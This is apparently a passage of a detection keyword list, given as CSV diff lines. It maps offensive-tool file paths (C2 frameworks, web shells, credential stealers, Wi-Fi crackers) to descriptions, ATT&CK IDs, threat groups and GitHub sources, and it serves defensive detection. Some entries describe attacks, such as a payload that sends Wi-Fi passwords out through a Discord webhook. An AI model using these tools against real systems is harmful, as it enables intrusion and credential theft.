+"*/webshells/shell.aspx*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*/webshells/shell.php*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*/WebSocketC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/Weevely*","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","41","113","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z"
+"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2909","606","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z"
+"*/well_known_sids.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions.
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z"
+"*/WerTrigger.git*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z"
+"*/WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*/whatlicense.git*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*/WheresMyImplant/*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*/whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the
security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*/whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/WiFiBroot*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also.
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
+"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z"
+"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets.
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z"
+"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z"
+"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
+"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 -
Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z"
+"*/win/Tor/tor.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z"
+"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z"
+"*/windapsearch.git*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z"
+"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/windows-login-phish*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z"
+"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/windows-resources/hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/winrm.cpp*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/winrmdll*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winrm-reflective-dll/*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
